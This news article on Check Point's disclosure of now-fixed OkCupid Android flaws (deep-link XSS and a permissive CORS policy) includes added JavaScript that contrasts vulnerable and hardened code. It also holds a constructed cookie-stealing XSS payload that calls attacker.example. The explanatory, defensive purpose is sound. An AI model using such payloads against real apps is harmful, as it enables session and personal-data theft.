Security researchers probing OkCupid have found vulnerabilities that could have let attackers steal sensitive user data.
OkCupid has registered more than 50 million users since its launch. As one of the most popular dating apps, alongside rivals such as Tinder, Plenty of Fish, eHarmony, Match and Grindr, the online dating platform is used to arrange roughly 50,000 dates a week.
At a time when the novel coronavirus pandemic and social distancing measures make it harder to meet new people in a bar or other public space, many of us have turned to online dating and virtual dates as an alternative.
Dating apps that have seen an increase in users, or requests for new features such as video chat, have begun to change how their platforms work, and OkCupid is no exception. The dating platform has seen a 20% increase in conversations and a 10% increase in matches since the COVID-19 lockdowns began.
However, with a growing user base comes additional risk to personal data when security is not up to scratch.
On Wednesday, Check Point Research disclosed a set of vulnerabilities in OkCupid that could have resulted in the exposure of sensitive profile data held in the OkCupid app, the hijacking of user accounts to perform actions without the owner's permission, and the theft of user authentication tokens, IDs and email addresses.
The app under test was OkCupid for Android, version 40.3.1, running on Android 6.0.1.
The researchers reverse-engineered the mobile app and found "deep link" functionality, which meant attackers could send custom, malicious links that open the mobile app at a chosen screen.
Reflected cross-site scripting (XSS) attack vectors were also found, caused by coding issues in the app's user settings functionality, paving the way for JavaScript code execution.
Chained together, an attacker could use a deep link to make the app issue an HTTP GET request to the attacker's own server carrying an XSS payload, and the resulting JavaScript would run inside the app's WebView.
If a victim clicked a specially crafted link, potentially sent privately through the app or posted to a public forum, PII, profile data, user characteristics such as those submitted when creating a profile, preferences, email addresses, IDs and authentication tokens could be compromised and exfiltrated to the attacker's command-and-control (C2) server.
Because the vulnerabilities could also be used to steal IDs and tokens, attackers could perform actions on a user's behalf, such as sending messages. Full account takeover was not possible, however, because of existing cookie protections.
Check Point also found a misconfigured Cross-Origin Resource Sharing (CORS) policy on the api.okcupid.com API server, which allowed any origin to send requests to the server and read the responses. Further attacks could cause user data to leak from the profile API endpoint.
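The chain described above, a deep-link parameter reflected unescaped into a page rendered in the app's WebView, is shown below as an added example; this is not OkCupid's code or Check Point's proof of concept. The `app://settings?section=` link shape, the section names and the constructed payload are assumptions for illustration. The vulnerable renderer is shown beside a hardened one that both allowlists the parameter and HTML-escapes whatever it emits.

```javascript
// Added example, not OkCupid's code. Deep-link scheme, host, parameter
// name and section names are hypothetical.

const ALLOWED_SECTIONS = new Set(["account", "notifications", "privacy"]);

// Parse a deep link such as app://settings?section=privacy. Anything that
// does not parse as a URL is rejected outright.
function parseDeepLink(link) {
  let url;
  try {
    url = new URL(link);
  } catch {
    return null;
  }
  return {
    scheme: url.protocol.replace(/:$/, ""),
    host: url.hostname,
    params: url.searchParams,
  };
}

// Minimal HTML escaping for text placed inside an element body.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// VULNERABLE: the untrusted parameter is concatenated straight into the
// page that the WebView will render, so a <script> in it executes with the
// page's access to tokens and profile data.
function renderSettingsVulnerable(link) {
  const dl = parseDeepLink(link);
  const section = (dl && dl.params.get("section")) || "";
  return `<h1>Settings: ${section}</h1>`;
}

// HARDENED: the link must have the expected scheme and host, the section
// must be one of a fixed set, and the emitted value is escaped anyway
// (defence in depth, in case the allowlist is relaxed later).
function renderSettingsHardened(link) {
  const dl = parseDeepLink(link);
  if (!dl || dl.scheme !== "app" || dl.host !== "settings") {
    throw new Error("unexpected deep link");
  }
  const section = dl.params.get("section") || "account";
  if (!ALLOWED_SECTIONS.has(section)) {
    throw new Error("unknown settings section");
  }
  return `<h1>Settings: ${escapeHtml(section)}</h1>`;
}

// Does a given renderer let a script tag from the link survive into the
// page? true means the deep link is an XSS sink.
function payloadSurvives(render, link) {
  try {
    return /<script\b/i.test(render(link));
  } catch {
    return false; // rejected link, nothing rendered
  }
}

// Constructed payload: exfiltrates the document cookie to an attacker host.
const PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>";
const MALICIOUS_LINK = "app://settings?section=" + encodeURIComponent(PAYLOAD);
const BENIGN_LINK = "app://settings?section=privacy";
```

Run with any recent Node; `payloadSurvives(renderSettingsVulnerable, MALICIOUS_LINK)` is `true` and `payloadSurvives(renderSettingsHardened, MALICIOUS_LINK)` is `false`, while the benign link renders the same heading through both paths.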
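What "any origin can send requests and read the responses" means in practice is shown below as an added example (not OkCupid's server code): a handler that echoes back whatever `Origin` the browser sends, a second one that uses a suffix check and is also bypassable, and a fixed exact-match allowlist. The allowed origin and the probe origins are constructed for illustration; the browser rule being modelled is the real one, that a credentialed cross-origin response is readable only when `Access-Control-Allow-Origin` equals the page's origin exactly and `Access-Control-Allow-Credentials` is `true`.

```javascript
// Added example, not OkCupid's code. Origins below are constructed.

const ALLOWED_ORIGINS = new Set(["https://www.okcupid.com"]);

// WEAK: the request's Origin is echoed back with credentials allowed, so a
// page on any site can read authenticated API responses (the user's cookies
// ride along with the request).
function weakCorsHeaders(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// STILL WEAK: a suffix check looks like an allowlist but accepts
// https://evilokcupid.com as well as the real domain.
function naiveSuffixCorsHeaders(requestOrigin) {
  if (!requestOrigin.endsWith("okcupid.com")) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// FIXED: only exact, allowlisted origins are granted. Everyone else gets no
// CORS headers, so the browser withholds the response body from the page.
// Vary: Origin stops caches from serving one origin's grant to another.
function strictCorsHeaders(requestOrigin) {
  if (!ALLOWED_ORIGINS.has(requestOrigin)) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Model of the browser check for a credentialed (cookie-bearing) request:
// the wildcard is never accepted with credentials, and the origin must match.
function credentialedReadAllowed(pageOrigin, headers) {
  const acao = headers["Access-Control-Allow-Origin"];
  const creds = headers["Access-Control-Allow-Credentials"] === "true";
  return creds && acao !== undefined && acao !== "*" && acao === pageOrigin;
}

// Audit helper: which of the probe origins would be able to read a
// credentialed response from this handler?
function auditCors(handler, probeOrigins) {
  return probeOrigins.filter((origin) =>
    credentialedReadAllowed(origin, handler(origin))
  );
}

// Constructed probe set: the real site, an unrelated attacker site, a
// look-alike domain, and the "null" origin a sandboxed iframe sends.
const PROBES = [
  "https://www.okcupid.com",
  "https://attacker.example",
  "https://evilokcupid.com",
  "null",
];
```

`auditCors(weakCorsHeaders, PROBES)` returns all four origins, the suffix version lets the look-alike domain through, and only the exact-match handler reduces the list to the single legitimate origin. The same audit can be run against a live endpoint by replacing the handler with a function that sends a request with a chosen `Origin` header and returns the response headers.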
While the theft of data submitted to a dating app may not seem especially serious, the large amount of personal information an attacker could collect this way could also be used in social engineering attempts, with far more damaging consequences.
"The app and platform were created to bring people together, but of course, where people go, criminals will follow, looking for easy pickings," the researchers said.
Check Point Research reported its findings to OkCupid and the security issues have since been resolved.
"Not a single user was impacted by the potential OkCupid vulnerability, and we were able to fix it within 48 hours," the company said. "We're grateful to partners like Checkpoint who, along with OkCupid, prioritize the security and privacy of our users."
In related news, in May MobiFriends was at the center of a data breach in which the personal data of 3.6 million users was compromised and uploaded online. The data dump also included poorly encrypted passwords.
ZDNet has contacted OkCupid with additional queries and will update when we hear back.
Have a tip? Get in touch securely via WhatsApp | Signal at +447713025499, or over at Keybase: charlie0